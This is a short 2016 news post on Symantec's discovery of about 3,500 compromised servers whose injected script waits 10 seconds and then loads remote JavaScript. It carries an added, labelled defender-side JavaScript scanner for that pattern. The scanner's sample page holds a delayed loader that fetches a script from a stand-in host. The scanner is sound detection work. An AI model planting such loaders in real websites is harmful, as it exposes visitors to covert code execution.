Symantec Discovers 3,500 Infected Servers
Posted by: Timothy Weaver on 01/27/2016 11:17 AM
Symantec reported the worldwide infection of 3,500 public servers, of which 75% are in the U.S.
The injected script redirects users to other compromised websites that could be used to download malware. The script is not yet delivering malware, but could be used as a recon effort. At this time no malware has been associated with this injection attack, and it does not lead to any malicious downloads.
Christian Tripputi, a security support manager for Symantec, said: "It is likely that the attacks are a reconnaissance activity to learn more about users and utilize that information in another attack. The possibilities for future attacks include the delivery of advertisements, SEO poisoning attacks, or criminals modifying the code to deliver malware and compromise unprotected users."
In the attack, a compromised page is loaded in the user's browser when that person visits the site. The malicious script then waits 10 seconds and runs remote JavaScript code, which in turn runs several additional scripts to hide the malicious code.
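A defender-side check for the behaviour described above, as an added example that is not from Symantec's report or the original post: it scans a page's inline scripts for a timer of several seconds that creates a script element pointing at another host. The 5-second threshold, the function names and the sample page are assumptions constructed for illustration.

```javascript
// Added example: flag inline scripts that wait, then load JavaScript from another host.
const MIN_DELAY_MS = 5000; // assumption: timers of 5 s or more count as "delayed"

// Bodies of inline <script> blocks (tags that carry no src attribute).
function inlineScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)]
    .filter((m) => !/\bsrc\s*=/i.test(m[1]) && m[2].trim())
    .map((m) => m[2]);
}

// Largest literal delay (ms) passed to setTimeout, or 0 if none is found.
function longestDelay(code) {
  const delays = [...code.matchAll(/setTimeout\s*\([\s\S]*?,\s*(\d+)\s*\)/g)].map((m) => Number(m[1]));
  return Math.max(0, ...delays);
}

// Hosts named in absolute or protocol-relative URLs, excluding the page's own host.
function foreignHosts(code, pageHost) {
  const re = /(?:https?:)?\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
  const hosts = [...code.matchAll(re)].map((m) => m[1].toLowerCase());
  return [...new Set(hosts)].filter((h) => h !== pageHost.toLowerCase());
}

// A finding needs all three signals: long timer, script-element creation, foreign host.
function scanPage(html, pageHost) {
  const findings = [];
  for (const code of inlineScripts(html)) {
    const delayMs = longestDelay(code);
    const createsScript = /createElement\s*\(\s*['"]script['"]\s*\)/i.test(code);
    const hosts = foreignHosts(code, pageHost);
    if (delayMs >= MIN_DELAY_MS && createsScript && hosts.length > 0) {
      findings.push({ delayMs, hosts });
    }
  }
  return findings;
}

// Constructed sample page: a delayed third-party loader, a short timer, a same-host loader.
const SAMPLE_HTML = `
<html><body>
<script>setTimeout(function () { var s = document.createElement('script'); s.src = '//cdn.example.invalid/x.js'; document.head.appendChild(s); }, 10000);</script>
<script>setTimeout(function () { console.log('tick'); }, 200);</script>
<script>setTimeout(function () { var s = document.createElement("script"); s.src = 'https://www.example.test/app.js'; document.head.appendChild(s); }, 8000);</script>
</body></html>`;

console.log(scanPage(SAMPLE_HTML, 'www.example.test'));
```

Legitimate lazy loaders match the same pattern, so a hit is a lead for manual review of the script, not a verdict.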
The servers are generally business, .edu and government types.
Source: SCMagazine
